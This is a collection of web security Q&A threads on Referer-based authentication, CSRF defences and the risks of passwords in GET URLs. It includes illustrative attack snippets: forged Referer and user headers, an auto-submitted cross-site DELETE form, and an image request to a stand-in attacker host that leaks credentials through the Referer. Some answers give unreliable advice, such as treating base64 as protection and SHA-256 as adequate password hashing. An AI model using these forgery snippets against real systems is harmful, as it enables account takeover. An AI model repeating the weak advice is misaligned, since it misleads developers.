As part of a project with a partner, we are required to provide single-sign-on service on our app. Basically, people will log in through our partner's website, then they are redirected to ours. The redirected request will have the user's data in the HTTP header fields.
Here's where it gets "iffy". Whether a redirected request is treated as valid depends on the value of the HTTP Referer field: our partner tells us to check this field to confirm that the source is legitimate.
Now I know (and I'm glad to be proven wrong) that this field is easy enough to forge, and since no other method of authentication is given to us, a malicious user could easily construct a false HTTP request and gain access to our web app.
I'm a programmer first, and admittedly know very little about the intricacies of HTTP. So are my concerns real? Would using SSL (somehow) void this concern?
Remember that rule number one is never trust client input. Like any other client input, the Referer header is trivial to forge. SSL does nothing for you because you still rely on client input. Also, note that browsers SHOULD NOT send Referer to http pages when referred by https pages.
Additionally, consider that many privacy-conscious people and proxies (that individuals may not have any control over) might strip Referer headers from their requests, breaking your scheme.
To do this properly, you need to use something like OAuth or OpenID, where the protocols have been designed to be secure.
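To see how little the Referer proves, here is a minimal sketch (Node.js; the hostnames, path, and extra header are placeholders, not your partner's real interface) of a client that fabricates both the Referer and the user-data headers. Your server cannot distinguish this from a genuine redirect:

const https = require('https');

const req = https.request({
  hostname: 'your-app.example.com',          // placeholder for your app
  path: '/sso/landing',
  method: 'GET',
  headers: {
    'Referer': 'https://partner.example.com/login',  // forged "legitimate" source
    'X-User-Id': 'victim@example.com'                // forged user data header
  }
}, res => console.log('status:', res.statusCode));
req.end();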
The HTTP Referer header is unreliable: depending on the browser used, it may not be sent at all.
Does http-equiv="refresh" keep referrer info and metadata?
Yes - It is forgeable.
No - A client can just as easily send a (fake) HTTPS request as a (fake) HTTP request. The only difference is the connection is encrypted. It says nothing about the data transmitted.
That being said, it is another precaution that can be used. It should not be relied upon for security, however.
I would look at Microsoft Federation -- it's likely overkill, but it shows one way to implement SSO securely.
Related
Some time ago I came across an option, in one of the software products I use at work, to turn off the server-side XSRF protection by including a special HTTP header value on the client side. Therefore, I wonder:
How is this not a security vulnerability?
Why would you implement a security feature and allow clients to turn it off? Is there a use-case I am missing?
I am doubting my knowledge of XSRF protection at the moment and since we could not reach a consensus at work I decided to post my concerns here.
The product is Bamboo and they publicly report the option in https://confluence.atlassian.com/bamkb/rest-api-calls-fail-due-to-missing-xsrf-token-899447048.html#RESTAPIcallsfailduetoMissingXSRFToken-Workaround. I first mentioned this in an old answer here: https://stackoverflow.com/a/45090321/410939.
I can understand allowing the server to turn it off on a per-API basis. However, allowing the client to turn it off is a very bad idea... It's as good as the protection not being there. The only reason I can think of for this being acceptable is backwards compatibility: perhaps an older client relies on this mechanism to mitigate CSRF while newer clients use a newer one, and the header lets them switch the older mechanism off (but at least one of the two must always be in effect).
I would turn the question around: why would you implement security features and then ask users to turn them on? This is the opt-in model to security you will find everywhere; for example, hardly anyone forces 2FA even though it is a huge security improvement.
If the XSRF token is session based, you run multiple tabs of the same application, and you are forced to reauthenticate in one of them, you will typically get a new XSRF token. The other tabs might then no longer pass the XSRF check, with the risk of losing unsaved work. There could be other similar scenarios.
There are sometimes trade-offs between security and usability; in this case they make security the default and let people who run into problems take an informed risk.
There are other ways to mitigate XSRF. So, if cookies are not an option (maybe the client doesn't support them), you might want to disable the cookie-based solution.
Some other ways to mitigate XSRF:
State Variable (Auth0 uses it) - The client generates and passes with every request a cryptographically strong random nonce, which the server echoes back along with its response, allowing the client to validate the nonce. It's explained in the Auth0 docs.
Always check the Referer header and accept requests only when the referer is a trusted domain. If the Referer header is absent or contains a non-whitelisted domain, simply reject the request (a minimal sketch follows below). When using SSL/TLS the referer is usually present. Landing pages (that are mostly informational and do not contain a login form or any secured content) may be a little more relaxed and allow requests with a missing Referer header.
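A minimal sketch of such a check as Express middleware (the whitelist, route wiring, and error messages are assumptions for illustration):

const TRUSTED = new Set(['www.example.com', 'partner.example.com']);

function refererCheck(req, res, next) {
  const referer = req.get('Referer');
  if (!referer) return res.status(403).send('Missing Referer');      // absent: reject
  let host;
  try {
    host = new URL(referer).hostname;        // parse instead of substring matching
  } catch (e) {
    return res.status(403).send('Malformed Referer');
  }
  if (!TRUSTED.has(host)) return res.status(403).send('Untrusted Referer');
  next();
}

// app.post('/transfer', refererCheck, handler);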
In Liferay, I would like to allow only logged-in users to make POST requests, and at the same time deny POST requests from other sources, such as Postman, for example.
With the caveat that I am not familiar with Liferay itself, I can tell you that in a general Web application what you are asking is impossible.
Let's consider the problem in its simplest form:
A Web application makes POST requests to a server
The server should allow requests only from a logged-in user using the Web application
The server is stateless - that is, each request must be considered atomically. There is no persistent connection and no state is preserved at the server.
So - let's consider what happens when the browser makes a POST:
An HTTP connection is opened to the server
The HTTP headers are sent, including any site cookies that have previously been set by the server, and special headers like the User Agent and referrer
The form data is posted to the server
The server processes the request and returns a response
How does the server know that the user is logged in? In most cases, this is done by checking a cookie that is sent with the request and verifying that it is correct - cryptographically signed, for instance.
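For concreteness, a minimal sketch of such a check, assuming an HMAC-signed cookie of the form value.signature (the format and secret are illustrative, not what Liferay actually does):

const crypto = require('crypto');
const SECRET = process.env.SESSION_SECRET || 'dev-only-secret';

function verifySessionCookie(cookieValue) {
  const [value, signature] = (cookieValue || '').split('.');
  if (!value || !signature) return null;
  const expected = crypto.createHmac('sha256', SECRET).update(value).digest('hex');
  const ok = expected.length === signature.length &&
             crypto.timingSafeEqual(Buffer.from(expected), Buffer.from(signature));
  return ok ? value : null;   // e.g. the user id, or null if missing/tampered
}

Note that this only proves the cookie was issued by the server; it says nothing about where the request came from.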
Now let's consider a Postman request. Exactly what is the difference between a request submitted through Postman and one submitted through the browser? None. There is no difference. It is trivially simple to examine and retrieve the cookies sent on a legitimate request from the browser, and include those headers in a faked Postman request.
Let's consider what you might do to prevent this.
1. Set and verify extra cookies - won't work because we can still retrieve those cookies just like we did with the login session
2. Encrypt the connection so the cookies can't be captured over the wire - won't work because I can capture the cookies from the browser
3. Check the User Agent to ensure that it is sent by a browser - won't work because I can spoof the headers to any value I want
4. Check the Referrer to ensure the request came from a valid page on my site (this is part of a Cross-Site Request Forgery mitigation) - won't work because I can always spoof the Referrer to any value I want
5. Add logic (JavaScript) into the page to compute some validity token - won't work because I can still read the JavaScript (it's client-side) and fake my own token
By the very nature of the Web system, this problem is insoluble. Because you (the server/application writer) do not have complete control over both sides of the communication, it is always possible to spoof requests from the client. The best you can do is prevent arbitrary requests from arbitrary users who do not have valid credentials. However, any request that includes the correct security tokens must be considered valid, whether it is generated from a browser/web page or crafted by hand or through some other application. At best, you will needlessly complicate your application for no significant improvement in security. You can prevent CSRF attacks and some other injection-type attacks, but because you as the client can always read whatever is sent from the server and can always craft your own requests, you can always provide a valid request.
Clarification
Can you please explain exactly what you are trying to accomplish? Are you trying to disable guest access completely, even through "valid" referrers (a user actually submitting a form) or are you trying to prevent post requests coming from other referrers?
If you are just worried about referrer forgeries you can set the following property in your portal-ext.properties file.
auth.token.check.enabled = true
If you want to remove all permissions for the guest role you can simply go into the portal's control panel, go into Configuration and then into the permissions table. Uncheck the entire row associated with guest.
That should do it. If you can't find those permissions post your exact Liferay version.
We have a webpage which uses the SAPUI5 framework to build a SPA. The communication between the browser and the server uses HTTPS. The interaction to log into the page is the following:
The user opens the website by entering https://myserver.com in the browser
A login dialogue with two form fields for username and password is shown.
After entering username and password and pressing the login button,
an AJAX request is sent using GET to the URL: https://myusername:myPassword@myserver.com/foo/bar/metadata
According to my understanding, using GET to send sensitive data is never a good idea. But this answer to "HTTPS - is the URL string secure?" says the following:
HTTPS Establishes an underlying SSL connection before any HTTP data is
transferred. This ensures that all URL data (with the exception of
hostname, which is used to establish the connection) is carried solely
within this encrypted connection and is protected from
man-in-the-middle attacks in the same way that any HTTPS data is.
And in another answer in the same thread:
These fields [for example form field, query strings] are stripped off
of the URL when creating the routing information in the https packaging
process by the browser and are included in the encrypted data block.
The page data (form, text, and query string) are passed in the
encrypted block after the encryption methods are determined and the
handshake completes.
But it seems that there still might be security concerns using GET:
the URL is stored in the logs on the server (also mentioned in the same thread)
leakage through browser history
Is this the case for URLs like these?
https://myusername:myPassword@myserver.com/foo/bar/metadata
// or
https://myserver.com/?user=myUsername&pass=MyPasswort
Additional questions on this topic:
Is passing get variables over ssl secure
Is sending a password in json over https considered secure
How to send securely passwords via GET/POST?
On security.stackexchange are additional informations:
can urls be sniffed when using ssl
ssl with get and post
But in my opinion a few aspects are still not answered
Question
In my opinion the mentioned points are valid objections to using GET. Is that the case; is using GET for sending passwords a bad idea?
Are these the attack options, or are there more?
browser history
server logs (assuming that the url is stored in the logs unencrypted or encrypted)
referer information (if this is really the case)
Which attack options do exist when sending sensitive data (password) over https using get?
Thanks
Sending any kind of sensitive data over GET is dangerous, even if it is HTTPS. These data might end up in log files at the server and will be included in the Referer header in links to or includes from other sites. They will also be saved in the history of the browser, so an attacker might try to guess and verify the original contents of the link with an attack against the history.
Apart from that you better ask that kind of questions at security.stackexchange.com.
These two approaches are fundamentally different:
https://myusername:myPassword@myserver.com/foo/bar/metadata
https://myserver.com/?user=myUsername&pass=MyPasswort
myusername:myPassword@ is the "User Information" component (this form is actually deprecated in the latest URI RFC), whereas ?user=myUsername&pass=MyPasswort is part of the query.
If you look at this example from RFC 3986:
  foo://example.com:8042/over/there?name=ferret#nose
  \_/   \______________/\_________/ \_________/ \__/
   |           |            |            |        |
scheme     authority       path        query   fragment
   |   _____________________|__
  / \ /                        \
  urn:example:animal:ferret:nose
myusername:myPassword@ is part of the authority. In practice, HTTP (Basic) authentication headers will generally be used to convey this information instead. On the server side, headers are generally not logged (and if they were, whether the client entered them into their location bar or via an input dialog would make no difference). In general (although it's implementation dependent), browsers don't store it in the location bar, or at least they remove the password. It appears that Firefox keeps the userinfo in the browser history, while Chrome doesn't (and IE doesn't really support them without a workaround).
In contrast, ?user=myUsername&pass=MyPasswort is the query, a much more integral part of the URI, and it is sent as the HTTP Request-URI. This will be in the browser's history and the server's logs. This will also be passed in the referrer.
To put it simply, myusername:myPassword@ is clearly designed to convey information that is potentially sensitive, and browsers are generally designed to handle this appropriately, whereas browsers can't guess which parts of which queries are sensitive and which are not: expect information leakage there.
The referrer information will also generally not leak to third parties, since the Referer header coming from an HTTPS page is normally only sent with other requests on HTTPS to the same host. (Of course, if you have used https://myserver.com/?user=myUsername&pass=MyPasswort, this will be in the logs of that same host, but you're not making it much worse since it stays in that same server's logs.)
This is specified in the HTTP specification (Section 15.1.3):
Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol.
Although it is just a "SHOULD NOT", Internet Explorer, Chrome and Firefox seem to implement it this way. Whether this applies to HTTPS requests from one host to another depends on the browser and its version.
It is now possible to override this behaviour, as described in this question and this draft specification, using a <meta> header, but you wouldn't do that on a sensitive page that uses ?user=myUsername&pass=MyPasswort anyway.
Note that the rest of HTTP specification (Section 15.1.3) is also relevant:
Authors of services which use the HTTP protocol SHOULD NOT use GET based forms for the submission of sensitive data, because this will cause this data to be encoded in the Request-URI. Many existing servers, proxies, and user agents will log the request URI in some place where it might be visible to third parties. Servers can use POST-based form submission instead
Using ?user=myUsername&pass=MyPasswort is exactly like using a GET based form and, while the Referer issue can be contained, the problems regarding logs and history remain.
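If you control the client, the usual fix is to keep credentials out of the URL entirely and submit them in a POST body over HTTPS. A minimal sketch (the /login endpoint and field names are assumptions, not part of the original question):

// Don't: credentials in the query string end up in logs, history and Referer.
// fetch('https://myserver.com/login?user=myUsername&pass=MyPasswort');

// Do: send them in the body of a POST over HTTPS.
fetch('https://myserver.com/login', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ user: 'myUsername', pass: 'MyPasswort' })
}).then(res => {
  if (!res.ok) throw new Error('Login failed');
  return res.json();
});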
Let's assume that a user clicked a button and the client browser generated the following request:
https://www.site.com/?username=alice&password=b0b123!
HTTPS
First things first: HTTPS is not really related to this topic, because from the attacker's perspective it does not matter whether you use POST or GET. When traffic is plain HTTP, attackers can easily grab sensitive data from the query string or directly from the POST request body, so the choice makes no difference there.
Server Logs
We know that Apache, Nginx and other servers log every single HTTP request to a log file, which means the query string ( ?username=alice&password=b0b123! ) will be written into the log files. This is dangerous because your system administrators can access this data too and grab all user credentials. Another case is when your application server is compromised. I assume you are storing passwords hashed; if you use a strong hashing algorithm like SHA-256, your clients' passwords are better protected against attackers. But attackers who can access the log files directly get the passwords as plain text with very basic shell scripts.
Referer Information
Assume the client opened the link above. When the client browser gets the HTML content and parses it, it will see an image tag. The image can be hosted outside of your domain ( postimage or similar services, or directly a domain under the attacker's control ). The browser makes an HTTP request in order to get the image, but the current URL is https://www.site.com/?username=alice&password=b0b123! which becomes the referer information!
That means alice and her password will be passed to another domain and will be directly accessible from that domain's web logs. This is a really important security issue.
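For illustration (the image host is a placeholder; note that modern browsers' default referrer policy may strip the query string for cross-origin requests, while older defaults sent the full URL):

// Any third-party resource embedded in the page at
// https://www.site.com/?username=alice&password=b0b123! is fetched with that
// full URL as the Referer, subject to the page's referrer policy.
const img = document.createElement('img');
img.src = 'https://images.attacker.example/pixel.png';   // request carries the Referer
document.body.appendChild(img);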
This topic reminds me of Session Fixation vulnerabilities. Please read the following OWASP article about an almost identical security flaw with sessions: https://www.owasp.org/index.php/Session_fixation. It's worth reading.
The community has provided a broad view on the considerations; the above stands with respect to the question. However, GET requests may, in general, need authentication. As observed above, sending the user name/password as part of the URL is never correct; however, that is typically not the way authentication information is handled. When a request for a resource is sent to the server, the server generally responds with a 401 and a WWW-Authenticate header, after which the client resends the request with an Authorization header carrying the credentials (in the Basic scheme). Now, this second request from the client can be a POST or a GET request; nothing prevents that. So, generally, it is not the request type but the mode of communicating the information that is in question.
Refer http://en.wikipedia.org/wiki/Basic_access_authentication
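For illustration, a sketch of that second request in the Basic scheme (URL and credentials are placeholders): the credentials travel in the Authorization header, not in the Request-URI.

const credentials = btoa('myUsername:MyPasswort');   // base64("user:pass")

fetch('https://myserver.com/foo/bar/metadata', {
  headers: { 'Authorization': 'Basic ' + credentials }
}).then(res => {
  if (res.status === 401) console.log('Server rejected the credentials');
  return res.json();
});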
Consider this:
https://www.example.com/login
Javascript within login page:
$.getJSON("/login?user=joeblow&pass=securepassword123");
What would the referer be now?
If you're concerned about security, an extra layer could be:
var a = btoa(user + ':' + pass); // base64-encode "user:pass" (btoa is the built-in)
$.getJSON("/login?a=" + a);
Although not encrypted, at least the data is obscured from plain sight.
Is CSRF possible with PUT or DELETE methods? Or does the use of PUT or DELETE prevent CSRF?
Great question!
In a perfect world, I can't think of a way to perform a CSRF attack.
You cannot make PUT or DELETE requests using HTML forms.
Images, Script tags, CSS Links etc all send GET requests to the server.
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets will block cross-domain requests.
So, in general, it shouldn't be possible to make a CSRF attack to a resource that supports PUT/DELETE verbs.
That said, the world isn't perfect. There may be several ways in which such an attack can be made possible:
Web Frameworks such as Rails have support for "pseudo method". If you put a hidden field called _method, set its value to PUT or DELETE, and then submit a GET or POST request, it will override the HTTP Verb. This is a way to support PUT or DELETE from browser forms. If you are using such a framework, you will have to protect yourself from CSRF using standard techniques
You may accidentally set up lax CORS response headers on your server. This would allow arbitrary websites to make PUT and DELETE requests.
At some point, HTML5 had planned to include support for PUT and DELETE in HTML Forms. But later, they removed that support. There is no guarantee that it won't be added later. Some browsers may actually have support for these verbs, and that can work against you.
There may just be a bug in some browser plugin that could allow the attacker to make PUT/DELETE requests.
In short, I would recommend protecting your resources even if they only support PUT and DELETE methods.
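As an illustration of the first point, a sketch of what an attacker page could do against a framework that honours a _method override field (the target URL is a placeholder):

// An ordinary cross-site POST form, auto-submitted; a framework that honours
// "_method" treats it as DELETE, and the victim's cookies ride along.
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://victim.example.com/articles/42';

const override = document.createElement('input');
override.type = 'hidden';
override.name = '_method';
override.value = 'DELETE';
form.appendChild(override);

document.body.appendChild(form);
form.submit();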
Yes, CSRF is possible with the PUT and DELETE methods, but only with CORS enabled with an unrestrictive policy.
I disagree with Sripathi Krishnan's answer:
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets
will block cross-domain requests
Nothing stops the browser from making a cross-domain request. The Same Origin Policy does not prevent a request from being made - all it does is prevent the request from being read by the browser.
If the server is not opting into CORS, this will cause a preflight request to be made. This is the mechanism that will prevent a PUT or DELETE from being used, because it is not a simple request (the method needs to be HEAD, GET or POST). Assuming a properly locked down CORS policy of course (or none at all which is secure by default).
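A sketch of what happens when a malicious page tries anyway (the target URL is a placeholder): a cross-origin PUT with a JSON body is not a simple request, so the browser sends an OPTIONS preflight first and never issues the PUT unless the target responds with permissive Access-Control-Allow-* headers.

fetch('https://victim.example.com/api/items/1', {
  method: 'PUT',
  credentials: 'include',                      // would attach the victim's cookies
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ owner: 'attacker' })
}).catch(err => console.log('blocked by CORS preflight:', err.message));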
No. Relying on an HTTP verb is not a way to prevent a CSRF attack. It's all in how your site is created. You can use PUTs as POSTs and DELETEs as GETs - it doesn't really matter.
To prevent CSRF, take some of the steps outlined here:
Web sites have various CSRF countermeasures available:
Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions
Requiring the client to provide authentication data in the same HTTP request used to perform any operation with security implications (money transfer, etc.)
Limiting the lifetime of session cookies
Checking the HTTP Referer header and/or checking the HTTP Origin header[16]
Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls[17]
Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies[18]
Verifying that the request's header contains X-Requested-With (used by Ruby on Rails before v2.0 and Django before v1.2.5). This protection has been proven insecure[19] under a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website, hence allowing a forged request.
In theory it should not be possible as there is no way to initiate a cross-domain PUT or DELETE request (except for CORS, but that needs a preflight request and thus the target site's cooperation). In practice I would not rely on that - many systems have been bitten by e.g. assuming that a CSRF file upload attack was not possible (it should not be, but certain browser bugs made it possible).
CSRF is indeed possible with PUT and DELETE depending on the configuration of your server.
The easiest way to think about CSRF is to think of having two tabs open in your browser, one open to your application with your user authenticated, and the other tab open to a malicious website.
If the malicious website makes a javascript request to your application, the browser will send the standard cookies with the request, thus allowing the malicious website to 'forge' the request using the already authenticated session. That website can do any type of request that it wants to, including GET, PUT, POST, DELETE, etc.
The standard way to defend against CSRF is to send something along with the request that the malicious website cannot know. This can be as simple as the contents of one of the cookies. While the request from the malicious site will have the cookies sent with it, it cannot actually access the cookies, because it is being served by a different domain and browser security prevents it from accessing the cookies for another domain.
Call the cookie content a 'token'. You can send the token along with requests, and on the server, make sure the 'token' has been correctly provided before proceeding with the request.
The next question is how you send that value with all the different requests, with DELETE being specifically difficult since it is not designed to have any kind of payload. In my opinion, the cleanest way is to specify a request header with the token, something like x-security-token: <token>. That way, you can look at the headers of incoming requests and reject any that are missing the token.
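A client-side sketch of that approach, assuming the token lives in a cookie that JavaScript is allowed to read (cookie and header names are illustrative):

function getCookie(name) {
  const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
}

fetch('/api/items/42', {
  method: 'DELETE',
  headers: { 'x-security-token': getCookie('csrf_token') || '' }
});
// The server rejects any state-changing request whose x-security-token header
// does not match the csrf_token cookie sent with the same request.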
In the past, standard AJAX security restricted what could be done via AJAX on the malicious server; however, nowadays the vulnerability depends on how your server is set up with regard to access-control configurations. Some people open up their server to make it easier to make cross-domain calls or for users to build their own RESTful clients or the like, but that also makes it easier for a malicious site to take advantage, unless CSRF prevention methods like the ones above are put in place.
What changes to the HTTP protocol spec, and to browser behaviour, would be required to prevent dangerous cases of cross-site request forgery?
I am not looking for suggestions as to how to patch my own web app. There are millions of vulnerable web apps and forms. It would be easier to change HTTP and/or the browsers.
If you agree to my premise, please tell me what changes to the HTTP and/or browser behaviour are needed. This is not a competition to find the best single answer, I want to collect all the good answers.
Please also read and comment on the points in my 'answer' below.
Roy Fielding, author of the HTTP specification, disagrees with your opinion, that CSRF is a flaw in HTTP and would need to be fixed there. As he wrote in a reply in a thread named The HTTP Origin Header:
CSRF is not a security issue for the Web. A well-designed Web
service should be capable of receiving requests directed by any host,
by design, with appropriate authentication where needed. If browsers
create a security issue because they allow scripts to automatically
direct requests with stored security credentials onto third-party
sites, without any user intervention/configuration, then the obvious
fix is within the browser.
And in fact, CSRF attacks were possible right from the beginning using plain HTML. The introduction of today's technologies like JavaScript and CSS only introduced further attack vectors and techniques that made request forging easier and more efficient.
But it didn’t change the fact that a legitimate and authentic request from a client is not necessarily based on the user’s intention. Because browsers do send requests automatically all the time (e. g. images, style sheets, etc.) and send any authentication credentials along.
Again, CSRF attacks happen inside the browser, so the only possible fix would need to be to fix it there, inside the browser.
But as that is not entirely possible (see above), it's the application's duty to implement a scheme that allows it to distinguish between authentic and forged requests. The always propagated CSRF token is such a technique. And it works well when implemented properly and protected against other attacks (many of them, again, only possible due to the introduction of modern technologies).
I agree with the other two; this could be done on the browser side, but it would make it impossible to perform authorized cross-site requests.
Anyways, a CSRF protection layer could be added quite easily on the application side (and, maybe, even on the webserver-side, in order to avoid making changes to pre-existing applications) using something like this:
A cookie is set to a random value, known only by server (and, of course, the client receiving it, but not a 3rd party server)
Each POST form must contain a hidden field whose value must be the same as the cookie's. If not, form submission must be prevented and a 403 page returned to the user (a server-side sketch follows below).
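A server-side sketch of that check, assuming an Express app with cookie and form-body parsing already configured (all names are illustrative):

const crypto = require('crypto');

function csrfCheck(req, res, next) {
  const fromCookie = req.cookies && req.cookies['csrf_token'];
  const fromForm = req.body && req.body['csrf_token'];
  const match = fromCookie && fromForm &&
                fromCookie.length === fromForm.length &&
                crypto.timingSafeEqual(Buffer.from(fromCookie), Buffer.from(fromForm));
  if (!match) return res.status(403).send('CSRF token mismatch');   // block the forgery
  next();
}

// app.post('/transfer', csrfCheck, handler);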
Enforce the Same Origin Policy for form submission locations. Only allow a form to be submitted back to the place it came from.
This, of course, would break all sorts of other things.
If you look at the CSRF prevention cheat sheet you can see that there are ways of preventing CSRF by relying upon the HTTP protocol. A good example is checking the HTTP referer which is commonly used on embedded devices because it doesn't require additional memory.
However, this is weak form of protection. A vulnerability like HTTP response splitting on the client side could be used to influence the referer value, and this has happened.
cookies should be declared 'local' (default) or 'remote'
the browser must not send 'local' cookies with a cross-site request
the browser must never send http-auth headers with a cross-site request
the browser must not send a cross-site POST or GET ?query without permission
the browser must not send LAN address requests from a remote page without permission
the browser must report and control attacks, where many cross-site requests are made
the browser should send 'Origin: (local|remote)', even if 'Referer' is disabled
other common web security issues such as XSHM should be addressed in the HTTP spec
a new HTTP protocol version 1.2 is needed, to show that a browser is conforming
browsers should update automatically to meet new security requirements, or warn the user
It can already be done:
Referer header
This is a weaker form of protection. Some users may disable referer for privacy purposes, meaning that they won't be able to submit such forms on your site. Also this can be tricky to implement in code. Some systems allow a URL such as http://example.com?q=example.org to pass the referrer check for example.org. Finally, any open redirect vulnerabilities on your site may allow an attacker to send their CSRF attack through the open redirect in order to get the correct referer header.
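A sketch of that pitfall: compare the parsed hostname instead of substring-matching the raw header (example.org stands in for the trusted domain).

function refererIsTrusted(referer, trustedHost) {
  if (!referer) return false;
  try {
    return new URL(referer).hostname === trustedHost;   // exact host comparison
  } catch (e) {
    return false;                                        // malformed Referer
  }
}

// refererIsTrusted('http://example.com/?q=example.org', 'example.org') === false
// refererIsTrusted('https://example.org/form', 'example.org')          === true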
Origin header
This is a new header. Unfortunately you will get inconsistencies between browsers that support it and do not support it. See this answer.
Other headers
For AJAX requests only, adding a header that is not allowed cross domain such as X-Requested-With can be used as a CSRF prevention method. Old browsers will not send XHR cross domain and new browsers will send a CORS preflight instead and then refuse to make the main request if it is explicitly not allowed by the target domain. The server-side code will need to ensure that the header is still present when the request is received. As HTML forms cannot have custom headers added, this method is incompatible with them. However, this also means that it protects against attackers using an HTML form in their CSRF attack.
Browsers
Browsers such as Chrome allow third-party cookies to be blocked. Although the explanation says that it'll stop cookies from being set by a third-party domain, it also prevents any existing cookies from being sent with the request. This will block "background" CSRF attacks. However, attacks that open a full page or a popup will succeed, though they will be more visible to the user.